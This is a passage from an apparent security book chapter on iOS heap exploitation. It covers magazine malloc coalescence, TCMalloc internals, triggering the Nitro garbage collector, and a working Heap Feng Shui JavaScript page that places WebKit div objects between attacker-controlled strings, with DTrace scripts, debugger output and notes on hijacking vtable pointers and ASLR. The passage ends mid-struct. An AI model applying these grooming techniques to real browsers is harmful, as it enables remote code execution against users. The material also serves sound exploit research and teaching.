With the first strategy the object will be fetched directly from the mag_last_free cache, and therefore no coalescence can take place. The second case makes sure that the next and the previous objects are not freed, again ensuring coalescence is not possible. The last case allows you to predict the size of the final object that will be coalesced, and thus be able to allocate a proper replacement object. To use the first or the second technique, you can use the examples previously shown in this chapter; you can try out the last technique with this simple application:
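#import <UIKit/UIKit.h>
#import "bookAppDelegate.h"   /* assumed header name for the bookAppDelegate class */
#include <stdlib.h>

/* Raise SIGINT in the current process so the attached debugger stops here:
   syscall 20 is getpid, syscall 37 is kill, and signal 2 is SIGINT. */
#define DebugBreak() \
    do { \
        __asm__("mov r0, #20\nmov ip, r0\nsvc 128\n" \
                "mov r1, #37\nmov ip, r1\nmov r1, #2\nmov r2, #1\nsvc 128\n" \
                : : : "memory", "ip", "r0", "r1", "r2"); \
    } while (0)

int main(int argc, char *argv[])
{
    unsigned long *ptr1, *ptr2, *ptr3, *ptr4;
    unsigned long *replacement;

    /* Four neighbours of different sizes; ptr2 is the object to replace. */
    ptr1 = malloc(48);
    ptr2 = malloc(64);
    ptr3 = malloc(80);
    ptr4 = malloc(24);
    DebugBreak();

    free(ptr1);
    free(ptr2);
    free(ptr3);
    free(ptr4);
    DebugBreak();

    /* 48 + 64 + 80 = 192: the size of ptr1, ptr2, and ptr3 once coalesced. */
    replacement = malloc(192);
    DebugBreak();

    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil,
            NSStringFromClass([bookAppDelegate class]));
    }
}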
The application allocates four objects, each of a different size. The goal is to replace ptr2. To do this you take block coalescence into account, and therefore the replacement object will be 192 bytes instead of 64 bytes. Running the application verifies this:
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin". tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-41
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language: auto; currently objective-c
(gdb) x/x ptr1
0x170760: 0x00000000
(gdb) c
Continuing.
ptr1 is allocated at 0x170760. Continuing the execution, you examine its content after all the pointers are freed:
Program received signal SIGINT, Interrupt.
0x0000240e in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        DebugBreak();
(gdb) x/4x ptr1
0x170760: 0x20000000 0x20000000 0x0000000c 0x00000000
(gdb) c
Continuing.
ptr1 was assigned to quantum 0x000c, which corresponds to 192 bytes. It appears you are on the right track. Finally, the application allocates the replacement object:
Program received signal SIGINT, Interrupt.
0x00002432 in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:38
38        DebugBreak();
(gdb) x/x replacement
0x170760: 0x20000000
(gdb)
The replacement object is correctly placed where ptr1 used to be in memory. ptr2 has been successfully replaced regardless of block coalescence.
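The size of the replacement can be worked out ahead of time with a few lines of arithmetic. The helpers below are a sketch: tiny_quanta and coalesced_bytes are names invented here, and the only fact they rely on is the 16-byte tiny quantum used throughout this chapter.

```c
#include <assert.h>
#include <stddef.h>

#define TINY_QUANTUM 16u   /* bytes per tiny quantum, as used in this chapter */

/* Number of quanta the allocator needs for a request of the given size. */
static unsigned tiny_quanta(size_t bytes)
{
    assert(bytes > 0);
    return (unsigned)((bytes + TINY_QUANTUM - 1) / TINY_QUANTUM);
}

/* Size in bytes of the block obtained when adjacent blocks are coalesced. */
static size_t coalesced_bytes(const size_t *sizes, size_t count)
{
    size_t total_quanta = 0;
    for (size_t i = 0; i < count; i++)
        total_quanta += tiny_quanta(sizes[i]);
    return total_quanta * TINY_QUANTUM;
}
```

For the three neighbours of 48, 64, and 80 bytes this gives 3 + 4 + 5 = 12 quanta (0x000c), or 192 bytes, which is the size requested for the replacement. Because every request is rounded up to whole quanta, three 24-byte neighbours coalesce into 96 bytes rather than 72.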
The next section examines a different allocator used by a number of applications, including MobileSafari.
TCMalloc is an allocator originally conceived by Sanjay Ghemawat, and it is meant to be as fast as possible in multi-threaded applications. As a matter of fact, the whole structure of the allocator reduces thread interaction and locking to a bare minimum.
TCMalloc is of great interest for us because it is the allocator of choice for WebKit. In this section you delve into it to understand how it works and how you can leverage it to your needs as attackers.
TCMalloc has two different mechanisms for dealing with large and small allocations. The former are managed by the so-called Pageheap and are directly relayed to the underlying OS allocator, which was already discussed, whereas the latter are handled entirely by TCMalloc.
Whenever an allocation for an object that is bigger than a user-defined threshold, kMaxSize, is requested, the page-level allocator is used. The page-level allocator, Pageheap, allocates spans, that is, a set of contiguous pages of memory.
The procedure starts by looking in the doubly linked list of spans already allocated to see whether any of the correct size are available to TCMalloc. The doubly linked list contains two types of spans: ones that are available for use and ones that were deallocated by TCMalloc but have yet to be returned to the underlying system heap.
If a deallocated span is available, it is first reallocated and then returned. If, instead, the span is available and not marked deallocated, it is simply returned. If no spans of the correct size are available, the page-level allocator tries to locate a bigger span that is “good enough” for the role; that is, a span that is as close as possible to the requested size. Once it has found such a span, it splits the span so that the rest of the memory can be used later and returns a span of the correct size.
If no suitable spans are available, a new set of pages is requested from the underlying OS and split into two memory objects: one of the requested size and another one of the allocated size minus the amount of memory needed by the requested allocation.
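The search-then-split behavior can be sketched as follows. This is a toy model rather than TCMalloc code: spans are reduced to page counts in a small array, the distinction between available and deallocated spans is ignored, and span_list, best_fit, span_alloc, and the grow parameter are all hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_SPANS 8

struct span_list { size_t pages[MAX_SPANS]; size_t count; };

/* Index of the smallest span that can hold `want` pages, or -1 if none. */
static int best_fit(const struct span_list *l, size_t want)
{
    int best = -1;
    for (size_t i = 0; i < l->count; i++) {
        if (l->pages[i] < want)
            continue;
        if (best < 0 || l->pages[i] < l->pages[(size_t)best])
            best = (int)i;
    }
    return best;
}

/* Serve `want` pages; returns the leftover pages kept for later use.
   `grow` is how many pages a (simulated) request to the OS yields. */
static size_t span_alloc(struct span_list *l, size_t want, size_t grow)
{
    size_t leftover;
    int i = best_fit(l, want);

    assert(want > 0 && grow >= want);
    if (i < 0) {                              /* nothing fits: ask the OS */
        assert(l->count < MAX_SPANS);
        l->pages[l->count] = grow;
        i = (int)l->count++;
    }
    leftover = l->pages[i] - want;            /* split off the requested part */
    if (leftover == 0)
        l->pages[i] = l->pages[--l->count];   /* exact fit: drop the entry */
    else
        l->pages[i] = leftover;               /* remainder stays available */
    return leftover;
}
```

With free spans of 4, 10, and 6 pages, a request for 5 pages is carved out of the 6-page span and leaves a 1-page remainder, while a request for 4 pages consumes the 4-page span entirely.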
When a span is not needed anymore, it is first coalesced with either the preceding span, the next span, or both, and then it is marked as free. Finally, the span is returned to the system by the garbage collector depending on a number of user-defined parameters, specifically, once the number of freed spans is greater than targetPageCount.
The mechanism used for allocating small objects is pretty convoluted. Each running thread has its own dedicated object cache and freelist. A freelist is a doubly linked list that is divided into allocation classes. The class for objects that are smaller than 1024 bytes is computed as follows: (object_size + 7)/8.
Objects that are bigger than that are 128-byte aligned, and the class is computed this way: (object_size + 127 + (120<<7))/128.
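The two formulas can be checked with a few lines of Python. This is only a sketch of the arithmetic quoted above; the function name is hypothetical, and the divisions are taken to be integer divisions. Both formulas give the same result for exactly 1024 bytes, so the choice of branch at the boundary does not matter.

```python
def size_class_index(object_size):
    """Return the allocation-class index given by the two formulas in the text."""
    if object_size <= 1024:
        # 8-byte granularity for small sizes.
        return (object_size + 7) // 8
    # 128-byte granularity above the threshold; the (120 << 7) term keeps
    # the indexes contiguous with the first range (1024 -> 128, 1025 -> 129).
    return (object_size + 127 + (120 << 7)) // 128


for size in (1, 60, 64, 65, 1024, 1025):
    print(size, size_class_index(size))
```

Requests of 60 and 64 bytes produce the same index, whereas a 65-byte request moves to the next one. Under this model, objects whose sizes round to the same index compete for the same freelist slots.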
In addition to the per-thread cache, a central cache exists. The central cache is shared by all threads and has the same structure as the thread cache.
When a new allocation is requested, the allocator first retrieves the thread cache for the current thread and looks into the thread freelist to verify whether any slots are available for the correct allocation class. If this fails, the allocator looks inside the central cache and retrieves an object from there. For performance reasons, when the thread cache is forced to ask the central cache for available objects, a whole range of objects is fetched instead of a single one.
In the scenario where both the thread cache and the central cache have no objects of the correct allocation class, those objects are fetched directly from the spans by following the procedure explained for large objects.
When a small object is deallocated, it is returned to the thread cache freelist. If the freelist exceeds a user-defined parameter, a garbage collection occurs.
The garbage collector then returns the unused objects from the thread cache freelist to the central cache freelist. Because all the objects in the central cache come from spans, whenever a new set of objects is reassigned to the central freelist, the allocator verifies whether the span the object belongs to is completely free or not. If it is, the span is marked as deallocated and will eventually be returned to the system, as explained before for large object allocation.
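The interplay between the thread cache and the central cache can be modeled in a few lines. The sketch below is a toy under stated assumptions rather than a rendition of the real allocator: objects are plain integers, the batch size and the collection threshold are made-up values, the class names are invented, and the thread freelist is assumed to hand back the most recently freed object first.

```python
class CentralCache:
    """Shared cache: one free list per allocation class."""

    def __init__(self):
        self.free_lists = {}
        self.next_object = 0  # stand-in for carving objects out of a span

    def fetch_batch(self, size_class, count):
        free_list = self.free_lists.setdefault(size_class, [])
        while len(free_list) < count:
            # Central cache has too few objects: "fetch more from a span".
            free_list.append(self.next_object)
            self.next_object += 1
        batch = free_list[-count:]
        del free_list[-count:]
        return batch

    def release(self, size_class, objects):
        self.free_lists.setdefault(size_class, []).extend(objects)


class ThreadCache:
    BATCH_SIZE = 4        # assumption: objects moved per central-cache request
    MAX_FREE_OBJECTS = 6  # assumption: freelist length that triggers collection

    def __init__(self, central):
        self.central = central
        self.free_lists = {}

    def malloc(self, size_class):
        free_list = self.free_lists.setdefault(size_class, [])
        if not free_list:
            # Thread freelist is empty: fetch a whole range, not one object.
            free_list.extend(self.central.fetch_batch(size_class, self.BATCH_SIZE))
        return free_list.pop()

    def free(self, size_class, obj):
        free_list = self.free_lists.setdefault(size_class, [])
        free_list.append(obj)
        if len(free_list) > self.MAX_FREE_OBJECTS:
            # "Garbage collection": hand the oldest half back to the central cache.
            half = len(free_list) // 2
            self.central.release(size_class, free_list[:half])
            del free_list[:half]
```

In this model, an object that is freed and immediately followed by an allocation of the same class is handed straight back to the caller, which is the property that makes object replacement predictable.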
This section dissects the techniques used to control the TCMalloc heap layout so that it becomes as predictable as possible. Specifically, it explains what steps are needed to exploit an object lifetime issue and talks about a technique called Heap Feng Shui. The technique was discussed publicly for the first time by Alex Sotirov, who tailored it to IE in order to exploit heap overflows there. Nonetheless, the same concepts can be applied to pretty much every heap implementation available on the market.
To obtain a predictable heap layout, the first thing you need to do is find an effective way to trigger the garbage collector. This is particularly important in the case of object lifetime issues because, most of the time, the objects aren't actually freed until a garbage collection occurs. The most obvious way of triggering the garbage collector is to use JavaScript. This, however, means that the techniques used are JavaScript-engine–dependent.
You can find the MobileSafari JavaScript engine, codenamed Nitro, in the JavaScriptCore folder inside the WebKit distribution. Each object allocated through JavaScript is wrapped into a JSCell structure. The TCMalloc garbage collector is heavily influenced by Nitro's behavior: as long as the JSCells are in use, the corresponding memory objects will not be freed.
To better understand this concept, take a look at the deallocation process of an HTML div object inside MobileSafari. You first allocate 10 HTML div objects, then you deallocate them and use a function (in this case Math.acos) to understand from the debugger when the deallocation is supposed to happen. Finally, you allocate a huge number of objects and see when the actual deallocation of the object happens:
Breakpoint 6, 0x9adbc1bb in WebCore::HTMLDivElement::create ()
(gdb) info reg
eax     0x28f0c0    2683072
ecx     0x40        64
edx     0x40        64
ebx     0xc006ba88  -1073300856
esp     0xc006b2a0  0xc006b2a0
ebp     0xc006b2b8  0xc006b2b8
esi     0x9adbc1ae  -1696874066
edi     0xc006ba28  -1073300952
eip     0x9adbc1bb  0x9adbc1bb <WebCore::HTMLDivElement::create(WebCore::QualifiedName const&, WebCore::Document*)+27>
eflags  0x282       642
cs      0x1b        27
ss      0x23        35
ds      0x23        35
es      0x23        35
fs      0x0         0
gs      0xf         15
(gdb) awatch *(int *)0x28f0c0
Hardware access (read/write) watchpoint 8: *(int *) 2683072
(gdb) c
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072
The div object is stored in EAX. You set a memory watchpoint on it to be able to track it during the execution.
Breakpoint 4, 0x971f9ee5 in JSC::mathProtoFuncACos () (gdb)
Now you have reached the point where the object is supposed to be deallocated, but the output shows that the object is still allocated as far as TCMalloc is concerned. Continuing further you get the following:
(gdb) continue
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072
Value = -1391648216
0x9ad7ee0e in WebCore::JSNodeOwner::isReachableFromOpaqueRoots ()
(gdb)
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072
Value = -1391648216
0x9ad7ee26 in WebCore::JSNodeOwner::isReachableFromOpaqueRoots ()
(gdb)
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072
Old value = -1391648216
New value = -1391646616
0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement::~HTMLDivElement() ()
(gdb) bt 20
#0 0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement::~HTMLDivElement() ()
#1 0x9adf60d2 in WebCore::JSHTMLDivElement::~JSHTMLDivElement ()
#2 0x970c5887 in JSC::MarkedBlock::sweep ()
Previous frame inner to this frame (gdb could not unwind past this frame)
(gdb)
So the object is freed only after the Nitro garbage collector is invoked. It is pretty vital, then, to understand when and how the Nitro garbage collector is triggered.
The Nitro garbage collector is invoked in three scenarios:
Clearly, the easiest way to control the garbage collector is through the third scenario. The process is much the same as in the previous example, where allocating a large number of objects triggered the collection. A number of objects can be used for this purpose, for instance images, arrays, and strings. As you see later in the Pwn2Own case study, strings and arrays are used there, but the choice of object depends on the bug in question.
The next important step is to find objects over which you have as much control as possible, use those to tame the heap, and, in the case of object lifetime issues, replace the faulty object. Usually, strings and arrays fit the purpose well. What you need to pay particular attention to, most of the time, is the ability to control the first four bytes of the object you are using to replace the faulty one, because those four bytes are where the virtual function table pointer is located, and controlling it is usually the easiest way to obtain code execution.
Debugging heap manipulation code can be tricky, and no default Mac OS X or iPhone tools offer support for TCMalloc heap debugging. Because the implementation of TCMalloc used on the iPhone is the same one used on Mac OS X, you can perform all the debugging needed on Mac OS X using DTrace. This section doesn't cover the details of DTrace or the D language, but presents two scripts that ease the debugging process. These scripts will be extremely useful for your exploitation work.
The first script records allocations of all sizes and prints a stack trace:
#pragma D option mangled

BEGIN
{
    printf("let's start with js tracing");
}

pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry
{
    printf("Size %d ", arg0);
    ustack(4);
}
The second one allows you to trace allocations and deallocations of a specific size:
#pragma D option mangled

BEGIN
{
    printf("let's start with allocation tracing");
}

pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry
{
    self->size = arg0;
}

pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:return
/self->size == 60/
{
    printf("Pointer 0x%x ", arg1);
    addresses[arg1] = 1;
    ustack(2);
}

pid$target:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry
/addresses[arg0]/
{
    addresses[arg0] = 0;
    printf("Object freed 0x%x ", arg0);
    ustack(2);
}
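When the trace grows long, it helps to reduce it to the set of tracked objects that are still allocated. The Python sketch below is a hypothetical helper, not part of the original tooling. It assumes the trace was saved to a text file and relies only on the two strings printed by the script above, "Pointer 0x..." and "Object freed 0x...", each appearing on its own output line.

```python
import re

POINTER_RE = re.compile(r"Pointer 0x([0-9a-fA-F]+)")
FREED_RE = re.compile(r"Object freed 0x([0-9a-fA-F]+)")


def live_pointers(trace_text):
    """Return the set of traced addresses that were allocated but not yet freed."""
    live = set()
    for line in trace_text.splitlines():
        match = POINTER_RE.search(line)
        if match:
            live.add(int(match.group(1), 16))
            continue
        match = FREED_RE.search(line)
        if match:
            # discard() tolerates frees of addresses that were never recorded.
            live.discard(int(match.group(1), 16))
    return live
```

Calling live_pointers() on the contents of the output file gives the addresses worth inspecting in the debugger.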
The only thing you need to do to port results from Mac OS X to iOS is determine the correct object sizes; those sizes might change between the two versions. Doing this is relatively easy; in fact, most of the time it is possible to locate the size of the object you are dealing with in a binary. Alternatively, by using BinDiff on the Mac OS X and iOS WebKit binaries, it is often possible to understand the size.
Another invaluable tool when it comes to debugging heap sprays is vmmap. This allows you to see the full content of the process address space. Grepping for JavaScript in the vmmap output shows which regions of memory are allocated by TCMalloc. Knowing common address ranges is useful when you have to do some guesswork on addresses (for instance, when pointing a fake vtable pointer to an attacker-controlled memory location).
In general, it is preferable when developing an exploit for iOS to debug it using the 32-bit version of Safari on Mac OS X instead of the 64-bit one. This way, the number of differences in terms of object sizes and allocator between the two will be significantly lowered.
Armed with knowledge of the allocator, the ways to trigger the garbage collector, and the objects to use, you can now proceed with shaping the heap.
The plan is pretty straightforward; the first step is to allocate a number of objects to defragment the heap. This is not rocket science, and depending on the state of the heap at the beginning of the execution of the exploit, the number of objects needed may change slightly. Defragmenting the heap is pretty important because it guarantees that the objects allocated afterward are placed consecutively in memory. Once the heap is defragmented, the goal is to create holes in between objects on the heap. To do so, you first allocate a bunch of objects and then free every other object. At this stage, you are all set to allocate the vulnerable object. If the defragmentation worked as expected, the heap will contain the vulnerable object in between two objects of your choice.
The last step is to trigger the bug and obtain code execution.
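The defragment, punch holes, and allocate sequence can be pictured with a toy model before looking at real code. The Python sketch below makes strong simplifying assumptions: the heap is a single run of equally sized slots, "S" stands for a controlled string and "V" for a vulnerable object, and the most recently freed slot is reused first. The function names are invented for illustration.

```python
def shape_heap(slot_count, victim_count):
    """Model one run of same-sized slots after defragmentation."""
    heap = ["S"] * slot_count            # consecutive controlled strings
    free_slots = []
    for index in range(0, slot_count, 2):
        heap[index] = None               # free every other string to create holes
        free_slots.append(index)
    for _ in range(victim_count):
        # Assumption: the most recently freed slot is handed out first.
        heap[free_slots.pop()] = "V"
    return heap


def victims_are_surrounded(heap):
    """Check that every existing neighbor of a 'V' slot is a controlled 'S' slot."""
    for index, slot in enumerate(heap):
        if slot != "V":
            continue
        neighbors = heap[max(index - 1, 0):index] + heap[index + 1:index + 2]
        if any(neighbor != "S" for neighbor in neighbors):
            return False
    return True


layout = shape_heap(10, 3)
print(layout)
print(victims_are_surrounded(layout))
```

In the model every vulnerable object lands in a hole flanked by controlled strings; on a real heap the same outcome has to be verified with the tracing techniques described earlier.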
The following code snippet illustrates the process that needs to be carried out to obtain the correct heap layout. You can use the DTrace script shown in the previous section to trace the allocations and verify that the JavaScript code is working properly:
<html> <body onload="start()"> <script> var shui = new Array(10000); var gcForce = new Array(30000); //30000 should be enough to trigger a garbage collection var vulnerable = new Array(10); function allocateObjects() { for(i = 0; i < shui.length; i++) shui[i] = String.fromCharCode(0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181); } function createHoles() { for(i = 0; i < shui.length; i+=2) delete shui[i]; } function forceGC() { for(i = 0; i < gcForce.length; i++) gcForce[i] = String.fromCharCode(0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282); } function allocateVulnerable() { for(i = 0; i < vulnerable.length; i++) vulnerable[i] = document.createElement("div"); } function start() { alert("Attach here"); allocateObjects(); createHoles(); forceGC(); allocateVulnerable(); } </script> </body> </html>
Before you can fully understand this code, you need to consider some things. First of all, it is vital to understand the size of the vulnerable object; in this case you are dealing with a 60-byte HTML div element. You can use different methods to ascertain the size of the object: either trace it dynamically in a debugger, use another DTrace script, or statically determine it by looking at the constructor of the object in a disassembler.
When the object size is known, the second thing you need to do is find a way to properly replace the object. Looking into the WebKit source code you can find the following code initializing a string:
PassRefPtr<StringImpl> StringImpl::createUninitialized(unsigned length, UChar*& data)
{
    if (!length) {
        data = 0;
        return empty();
    }

    // Allocate a single buffer large enough to contain the StringImpl
    // struct as well as the data which it contains. This removes one
    // heap allocation from this call.
    if (length > ((std::numeric_limits<unsigned>::max() - sizeof(StringImpl)) / sizeof(UChar)))
        CRASH();
    size_t size = sizeof(StringImpl) + length * sizeof(UChar);
    StringImpl* string = static_cast<StringImpl*>(fastMalloc(size));
    data = reinterpret_cast<UChar*>(string + 1);
    return adoptRef(new (string) StringImpl(length));
}
So, it appears that an attacker can easily control the size of the allocation. In the past, strings were even better in that the attacker had total control over the whole content of the buffer. These days, strings turn out to be less useful because no obvious ways exist to control the first four bytes of the buffer. Nonetheless, for the purpose of this chapter you will be using them because they can be sized easily to fit any vulnerable object size that might be needed.
Of particular importance is the way the size of the string allocation is calculated:
size_t size = sizeof(StringImpl) + length * sizeof(UChar);
This tells you how many characters you need to put in your JavaScript code. The size of StringImpl is 20 bytes, and a UChar is two bytes long. Therefore, to allocate 60 bytes of data you need 20 characters in the JavaScript string.
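The same arithmetic can be written down as a pair of helpers. This is a sketch only; the function names are hypothetical, and the 20-byte header and 2-byte UChar are the values quoted above, which may differ in other WebKit builds.

```python
STRINGIMPL_SIZE = 20  # bytes, value quoted in the text for this WebKit build
UCHAR_SIZE = 2        # bytes per UChar


def allocation_size(length, header=STRINGIMPL_SIZE, uchar=UCHAR_SIZE):
    """Mirror of: size = sizeof(StringImpl) + length * sizeof(UChar)."""
    return header + length * uchar


def chars_for_allocation(target_size, header=STRINGIMPL_SIZE, uchar=UCHAR_SIZE):
    """Number of characters whose string allocation is exactly target_size bytes."""
    payload = target_size - header
    if payload <= 0 or payload % uchar:
        raise ValueError("target size cannot be matched exactly by a string")
    return payload // uchar


print(chars_for_allocation(60))  # 20 characters for the 60-byte div element
```

Passing a different header value makes it easy to redo the computation when the size of StringImpl changes between versions.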
At this point you are all set to verify that the code is working properly, that is, the HTML div elements are allocated between strings.
Running this code in the browser and tracing the output with the DTrace script provided earlier shows the following output:
snaggs-MacBook-Air:~ snagg$ sudo dtrace -s Documents/Trainings/Mac hacking training/Materials/solutions_day2/9_WebKit/traceReplace.d -p 1498 -o out2
dtrace: script 'Documents/Trainings/Mac hacking training/Materials/solutions_day2/9_WebKit/traceReplace.d' matched 6 probes
dtrace: 2304 dynamic variable drops
dtrace: error on enabled probe ID 6 (ID 28816: pid1498:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry): invalid address (0x3) in action #3
^Csnaggs-MacBook-Air:~ snagg$
snaggs-MacBook-Air:~ snagg$ cat out2 | grep HTMLDiv
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
snaggs-MacBook-Air:~ snagg$ cat out2 | grep HTMLDiv | wc -l
10
You have the 10 vulnerable objects in the DTrace output. By attaching to the process with gdb you can verify that the div objects are allocated between strings. Arbitrarily picking one of the 10 vulnerable objects from the DTrace output, you have:
2 8717 _ZN3WTF10fastMallocEm:return Pointer 0x2e5ec00
JavaScriptCore`_ZN3WTF10fastMallocEm+0x1b2
WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
Now you can inspect the memory with gdb:
(gdb) x/40x 0x2e5ec00
0x2e5ec00: 0xad0d2228 0xad0d24cc 0x00000001 0x00000000
0x2e5ec10: 0x6d2e8654 0x02f9cb00 0x00000000 0x00000000
0x2e5ec20: 0x00000000 0x0058003c 0x00000000 0x00000000
0x2e5ec30: 0x00306ed0 0x00000000 0x00000000 0x00000000
0x2e5ec40: 0x02e5e480 0x00000014 0x02e5ec54 0x00000000
0x2e5ec50: 0x00000000 0x81818181 0x81818181 0x81818181
0x2e5ec60: 0x81818181 0x81818181 0x81818181 0x81818181
0x2e5ec70: 0x81818181 0x81818181 0x81818181 0x00000010
0x2e5ec80: 0x00000000 0x00000030 0x00000043 0x00000057
0x2e5ec90: 0x00000000 0x81818181 0x81818181 0x81818181
(gdb) x/40x 0x2e5ec00 - 0x40
0x2e5ebc0: 0x02e5ed00 0x00000014 0x02e5ebd4 0x00000000
0x2e5ebd0: 0x00000000 0x81818181 0x81818181 0x81818181
0x2e5ebe0: 0x81818181 0x81818181 0x81818181 0x81818181
0x2e5ebf0: 0x81818181 0x81818181 0x81818181 0x82828282
0x2e5ec00: 0xad0d2228 0xad0d24cc 0x00000001 0x00000000
0x2e5ec10: 0x6d2e8654 0x02f9cb00 0x00000000 0x00000000
0x2e5ec20: 0x00000000 0x0058003c 0x00000000 0x00000000
0x2e5ec30: 0x00306ed0 0x00000000 0x00000000 0x00000000
0x2e5ec40: 0x02e5e480 0x00000014 0x02e5ec54 0x00000000
0x2e5ec50: 0x00000000 0x81818181 0x81818181 0x81818181
(gdb)
It is clear that the div object at 0x2e5ec00 sits between two strings filled with your own content (0x8181), one immediately before it and one immediately after it.
The importance of being able to overwrite application-specific data in TCMalloc lies in the fact that, similar to what is done for objects in the large region in magazine malloc, the heap metadata is stored separately from each heap block. Therefore, overwriting a TCMalloc'd buffer will not overwrite heap metadata, but rather the buffer allocated after it. Thus, it is not possible to take advantage of the typical old heap exploitation techniques used to obtain code execution.
When it comes to object lifetime issues, it is not strictly necessary to have the vulnerable object in between two objects over which you have control. It is more important to ensure that you are able to replace the object with good reliability. In this scenario, the first step of the attack is to allocate one or more vulnerable objects. Afterward, the action that triggers the release of the object needs to be performed. The next step is to allocate enough objects of the same size as the vulnerable object to make sure that a garbage collection occurs and, at the same time, that the vulnerable object is replaced with an object of your choice. At this point the only step left is to trigger a “use” condition to obtain code execution.
It is important to note that the same procedure used for arithmetic vulnerabilities can be used for object lifetime issues as well. However, in that case you must pay particular attention to the size of the objects you use and the number of objects you allocate. In fact, the first time you defragment the heap, a garbage collection occurs; therefore, to trigger the garbage collector another time after the object is freed, a higher number of objects is required.
The same problem occurs when you free the objects in between the ones you control; to make sure that the vulnerable object is placed in a hole, another garbage collection must be triggered. Given the structure of TCMalloc, it is clear that the ideal way of triggering the garbage collector to exploit the vulnerability is to use objects of a different size than the vulnerable one. In fact, by doing so the freelist for the vulnerable object will not change much and you avoid jeopardizing the success of your exploit.
Before version 4.3 it was possible to develop a Return Oriented Programming (ROP) payload and an exploit for iOS without worrying too much about Address Space Layout Randomization (ASLR). In fact, although there was still some guesswork involved in understanding where attacker-controlled data would be placed in the process address space, there were no problems in terms of ROP payload development because the libraries, the main binary, and the dynamic linker were all placed at predictable addresses.
Starting with iOS 4.3, Apple introduced full address space layout randomization on the iPhone.
ASLR on iOS randomizes all the libraries that are stored together in dyld_shared_cache, the dynamic linker, the heap, and the stack. If the application supports position-independent code, the main executable is randomized as well.
This poses numerous problems for attackers, mainly for two reasons. The first is that a ROP payload can no longer be built from addresses known in advance, and the second is the guesswork involved in finding the address where attacker-controlled data might be placed.
There is no one-size-fits-all way to defeat ASLR. Quite the contrary — every exploit has its own peculiarities that might provide a way to leak addresses useful to an attacker.
A good example of ASLR defeat through repurposing an overflow is the Saffron exploit by comex. In that exploit, a missing check on an argument counter allowed an attacker to read and write from the following structure:
typedef struct T1_DecoderRec_
{
    T1_BuilderRec        builder;
    FT_Long              stack[T1_MAX_CHARSTRINGS_OPERANDS];
    FT_Long*             top;
    T1_Decoder_ZoneRec   zones[T1_MAX_SUBRS_CALLS + 1];
    T1_Decoder_Zone      zone;
    FT_Service_PsCMaps   psnames;       /* for seac */
    FT_UInt              num_glyphs;
    FT_Byte**            glyph_names;
    FT_Int               lenIV;         /* internal for sub routine calls */
    FT_UInt              num_subrs;
    FT_Byte**            subrs;
    FT_PtrDist*          subrs_len;     /* array of subrs length (optional) */
    FT_Matrix            font_matrix;
    FT_Vector            font_offset;
    FT_Int               flex_state;
    FT_Int               num_flex_vectors;
    FT_Vector            flex_vectors[7];
    PS_Blend             blend;         /* for multiple master support */
    FT_Render_Mode       hint_mode;
    T1_Decoder_Callback  parse_callback;
    T1_Decoder_FuncsRec  funcs;
    FT_Long*             buildchar;
    FT_UInt              len_buildchar;
    FT_Bool              seac;
